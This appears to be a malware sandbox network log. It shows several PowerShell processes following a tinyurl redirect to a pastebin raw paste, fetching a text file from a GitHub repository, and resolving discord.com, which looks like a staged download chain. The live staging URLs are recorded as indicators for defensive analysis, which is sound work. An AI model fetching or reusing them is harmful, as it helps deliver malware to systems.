                                                            Oct 15, 2024 15:59:59.145500898 CEST1.1.1.1192.168.2.60x2be3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.925441027 CEST1.1.1.1192.168.2.60xc870No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.925441027 CEST1.1.1.1192.168.2.60xc870No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.925441027 CEST1.1.1.1192.168.2.60xc870No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.925441027 CEST1.1.1.1192.168.2.60xc870No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:14.925441027 CEST1.1.1.1192.168.2.60xc870No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:23.732774019 CEST1.1.1.1192.168.2.60xf47fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:23.732774019 CEST1.1.1.1192.168.2.60xf47fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 16:00:23.732774019 CEST1.1.1.1192.168.2.60xf47fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            • pastebin.com
                                                            • raw.githubusercontent.com
                                                            • discord.com
                                                            • tinyurl.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649727104.17.112.233804040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:57.469630957 CEST164OUTGET /yeykydun HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: tinyurl.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:58.097490072 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Referrer-Policy: unsafe-url
                                                            X-Robots-Tag: noindex
                                                            X-TinyURL-Redirect-Type: redirect
                                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                            X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            CF-Cache-Status: HIT
                                                            Age: 393
                                                            Set-Cookie: __cf_bm=I2mt2P6JL.NlKMqjoWgJYP36VSX1.U7kT9XKgDSBXp8-1729000798-1.0.1.1-oL7um6T_cpN2qhmI6zgFYr9NsNDhA_zz6JuMQmyYbeL5YifwQ4VBks3XxbeDpcCZZuL0eA2i.Ezm2V0eC8BgCw; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8d30552b8e396b3d-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                            Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                            Oct 15, 2024 15:59:58.097503901 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                            Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.649728104.17.112.233802536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:57.470742941 CEST164OUTGET /yeykydun HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: tinyurl.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:58.095881939 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Referrer-Policy: unsafe-url
                                                            X-Robots-Tag: noindex
                                                            X-TinyURL-Redirect-Type: redirect
                                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                            X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            CF-Cache-Status: HIT
                                                            Age: 393
                                                            Set-Cookie: __cf_bm=L.1rAnFPcPJl4IPBnDbWON0YoygdPHBvnLbgZhAbhkI-1729000798-1.0.1.1-TIgp5a.7OaaozbfpUG9o3ulD.nUARwF1XbdLbPkvqKp_MJW_Wlhh3sV_r7f4LwTwgSwmMvs7KSTDFLLGzxT7YA; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8d30552b9b55e71a-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                            Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                            Oct 15, 2024 15:59:58.095921993 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                            Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.649729104.17.112.233802992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:57.470959902 CEST164OUTGET /yeykydun HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: tinyurl.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:58.098251104 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 13:59:58 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Referrer-Policy: unsafe-url
                                                            X-Robots-Tag: noindex
                                                            X-TinyURL-Redirect-Type: redirect
                                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                            X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            CF-Cache-Status: HIT
                                                            Age: 393
                                                            Set-Cookie: __cf_bm=xYxSBqxSCGX0azfzEcAu.rQUHw5MjYMxydf0ubtWPYc-1729000798-1.0.1.1-DeV2XvkelIjrOb3TOvbVk7qbXyM7xdDgZzlRw4TUPaaNCFOLPWy0TMala7G7IM3dZq0bmvAILMkyniQzCScChQ; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8d30552b982828d5-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                            Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                            Oct 15, 2024 15:59:58.098274946 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                            Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.649742185.199.109.133802536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:59.153279066 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:59.900347948 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210060-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000800.690036,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:04:59 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.649743185.199.109.133802992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:59.153501987 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:59.900305986 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210025-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000800.688348,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:04:59 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.649746104.17.112.233801396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:59.308444977 CEST164OUTGET /yeykydun HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: tinyurl.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 15:59:59.934580088 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Referrer-Policy: unsafe-url
                                                            X-Robots-Tag: noindex
                                                            X-TinyURL-Redirect-Type: redirect
                                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                            X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            CF-Cache-Status: HIT
                                                            Age: 394
                                                            Set-Cookie: __cf_bm=0Eyl_qBHLCzv83JYLFaxOK_DQbsBCUFFHhj2iEsh.8U-1729000799-1.0.1.1-glv4sEC3cDZCjzBUWba6taxQzxfuMcnHcvOejHnBnCruNyHTJCkYGwv.D.7geHcXBI8oFocYzM51ya9EO2k97g; path=/; expires=Tue, 15-Oct-24 14:29:59 GMT; domain=.tinyurl.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055371d316bc6-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                            Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                            Oct 15, 2024 15:59:59.934639931 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                            Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.649747185.199.109.133804040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 15:59:59.461673021 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:00.057195902 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 13:59:59 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120029-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000800.993274,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:04:59 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.649757185.199.109.133801396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 16:00:00.743700981 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:01.335105896 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120080-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000801.270939,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.649881172.67.19.24802248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 16:00:23.747190952 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:24.372405052 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 14:00:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 15:00:24 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055cfd90ee7b3-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.649894185.199.109.133802248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 16:00:25.237832069 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:26.832339048 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding
                                                            Oct 15, 2024 16:00:26.833522081 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding
                                                            Oct 15, 2024 16:00:26.834574938 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.649926172.67.19.24803780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 16:00:31.882006884 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:32.495598078 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 14:00:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 15:00:32 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d305602aaea6c55-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.649938185.199.109.133803780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 16:00:33.499825001 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:34.105288029 CEST541INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
